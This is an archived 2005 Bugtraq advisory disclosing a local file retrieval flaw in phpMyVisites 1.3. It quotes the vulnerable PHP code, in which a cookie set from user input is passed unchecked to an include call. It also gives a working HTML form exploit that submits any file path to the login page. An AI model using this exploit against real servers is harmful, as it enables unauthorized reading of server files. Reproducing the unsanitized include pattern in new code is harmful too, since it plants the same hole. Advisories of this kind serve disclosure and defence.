[exploits] phpMyVisites 1.3 local file retrieval

From: Max Cerny (max_at_czerny.cz)
Date: 04/26/05

Next message: Kold: "GrayCMS php code injection"

Previous message: Emanuele \: "E-Cart E-Commerce Software EXPLOIT"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 26 Apr 2005 19:35:00 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

==================================================================
File: phpMyVisites 1.3 local file retrieval
From: remote
Date: 26/04/2005
Credits: Max Cerny (max[at]czerny[dot]cz)
Vendor: http://www.phpmyvisites.net
Affected version: 1.3, > not tested
==================================================================

==================================================================
Description:
Remote user can retrieve local file on the webserver
phpMyVisites is running on. It's cause due to bad user data
validation code.

FILE: include/set_lang.php

line 94:
include "./langs/".$lang['default_lang'];

assuming, we have set $lang['default_lang'] on line 66:
$lang['default_lang'] = $_COOKIE[$nomcookielg];

it's good, look onto
line 40:
setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);

Now, we are able to spoof the value of $_POST['mylang'] to any file,
we want to be retrieved.

==================================================================

==================================================================
Exploit:
<form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>

==================================================================

==================================================================
Fix:
Contact the Vendor

==================================================================
Have a nice Day !
==================================================================

Next message: Kold: "GrayCMS php code injection"

Previous message: Emanuele \: "E-Cart E-Commerce Software EXPLOIT"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: C/VB dll for "browsing" large datasets?
... We did a massive project where the total database size is over 80GB with ... Gods name are you allowing users to retrieve such large sets of data. ... fetching from FoxPro will improve the thru-put. ... Most of the queries are simply pulling a vendor to work. ...
(microsoft.public.fox.programmer.exchange)
Re: C code for Internet Access
... > Can someone provide me with a simple prototype for internet access ... That will retrieve the URL and store it in the local file as given ... you can parse it locally using some program you write. ...
(comp.lang.c)
Re: set field in web page
... So the first step would be to retrieve the login page ... >of the vendor, ... >fields on the page with username/password, then post this and retrieve the ... >resulting response containing the page appearing after login. ...
(microsoft.public.dotnet.framework.aspnet.webcontrols)
Establishing a mail-only account?
... Is there a way to define a user account for a remote user such that the ... user can ONLY retrieve his/her ... mail via POP3 or IMAP, and cannot run any other functionality (such as ...
(Fedora)
Re: Bulkloading external xml file
... but how can I retrieve it and save it to a local file? ... > local file and pass the stream or file reference to the execute method. ... >> Can I call an external url which requests a xml file when executing a ...
(microsoft.public.sqlserver.xml)